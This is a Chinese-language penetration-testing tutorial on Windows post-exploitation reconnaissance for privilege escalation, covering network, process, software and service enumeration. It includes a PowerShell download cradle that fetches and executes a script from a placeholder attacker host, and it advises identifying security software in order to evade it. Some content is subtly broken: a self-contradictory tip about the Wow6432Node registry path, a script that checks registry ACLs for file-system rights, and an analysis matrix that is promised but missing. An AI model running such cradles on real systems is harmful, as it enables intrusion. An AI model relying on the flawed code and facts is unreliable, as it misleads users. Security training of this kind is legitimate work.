Windows渗透测试：系统信息收集与权限提升实战

1. Windows权限提升实战：系统信息深度收集指南（下）

作为渗透测试工程师，当我们通过初始漏洞利用获得Windows系统的普通用户权限后，接下来的关键任务就是通过系统化信息收集寻找权限提升路径。上篇我们讨论了用户账户、系统配置和敏感文件枚举，本篇将聚焦网络拓扑、应用进程这两个同样重要的攻击面。

1.1 网络信息收集：绘制内网作战地图

1.1.1 网络接口与路由表侦查

在已获取的cmd shell中执行以下命令获取基础网络配置：

batch复制ipconfig /all
route print
arp -a

这三个命令分别揭示：

• 所有网络接口的IP、子网掩码、DNS等配置（包括隐藏的虚拟网卡）
• 系统的路由规则，显示可能存在的多网卡跨网段访问路径
• 本地ARP缓存，反映近期与本机通信的其他主机

实战经验：企业内网常存在"跳板机"场景——某台服务器同时连接办公网和生产网。通过路由表若发现多网卡配置，往往意味着横向移动的机会。

1.1.2 活动连接分析与端口扫描

使用netstat结合tasklist进行深度关联分析：

batch复制netstat -ano | findstr ESTABLISHED
tasklist /FI "PID eq [进程ID]"

特别注意以下三类连接：

1. 出向的LDAP/Kerberos连接 → 可能暴露域控制器IP
2. 入向的RDP/SMB连接 → 可能来自管理员工作站
3. 非常用端口的长连接 → 可能是自定义管理通道

对于本地开放的高权限服务端口，可用PowerShell进行精准扫描：

powershell复制1..1024 | % {Test-NetConnection -ComputerName 127.0.0.1 -Port $_ -WarningAction SilentlyContinue} | ? {$_.TcpTestSucceeded -eq $true}

1.2 应用与进程分析：寻找特权突破口

1.2.1 已安装软件审计

通过注册表获取完整的安装程序清单：

batch复制reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s

重点关注：

• 安全软件（杀毒/EDR/HIPS）→ 需要规避检测
• 开发工具（Python/Java/VS）→ 可能包含漏洞组件
• 管理软件（远程维护/监控工具）→ 可能有提权漏洞

避坑提示：32位系统还需检查HKLM\SOFTWARE\Wow6432Node路径，64位系统会在此处存储32位程序信息。

1.2.2 进程树与服务映射

使用PowerShell获取带完整命令行参数的进程列表：

powershell复制Get-WmiObject Win32_Process | Select-Object ProcessId,Name,CommandLine,ParentProcessId | Format-Table -AutoSize

分析技巧：

1. 识别以SYSTEM/NETWORK SERVICE运行的进程
2. 检查进程的二进制路径是否可写
3. 注意周期性启动的定时任务进程
4. 查找使用了危险参数的程序（如未加密的凭证）

1.3 自动化信息收集方案

1.3.1 推荐工具链组合

• WinPEAS：全面的本地检查脚本
• AccessChk：权限配置审计工具
• PowerUp：经典的提权漏洞扫描模块

典型执行流程：

powershell复制IEX(New-Object Net.WebClient).DownloadString('http://attacker/Invoke-AllChecks.ps1')
Invoke-AllChecks -HTMLReport -OutputFile recon.html

1.3.2 自定义检查脚本示例

以下PowerShell脚本可提取关键网络服务配置：

powershell复制$services = Get-WmiObject Win32_Service | Where {
    $_.StartMode -eq 'Auto' -and $_.State -eq 'Running'
}
$services | ForEach-Object {
    $acl = (Get-Acl "HKLM:\SYSTEM\CurrentControlSet\Services\$($_.Name)").Access
    [PSCustomObject]@{
        ServiceName = $_.Name
        BinaryPath = $_.PathName
        User = $_.StartName
        VulnerableACL = ($acl | ? {$_.FileSystemRights -match 'Write'}).IdentityReference
    }
} | Export-Csv -Path services_audit.csv

1.4 信息整合与攻击路径规划

将收集到的数据整理为如下矩阵进行分析：

在实际测试中，我通常会优先检查：

1. 未打补丁但公开EXP的高危漏洞
2. 配置错误导致的权限滥用
3. 可被替换的服务二进制文件
4. 存储明文凭证的配置文件

最后提醒：所有信息收集操作都应记录时间戳和原始数据。在真实渗透测试中，这些记录既是后续攻击的依据，也是最终报告的重要组成部分。建议使用如下命令自动生成时间戳：

batch复制powershell -c "Get-Date -Format 'yyyyMMdd_HHmmss' >> recon_log.txt"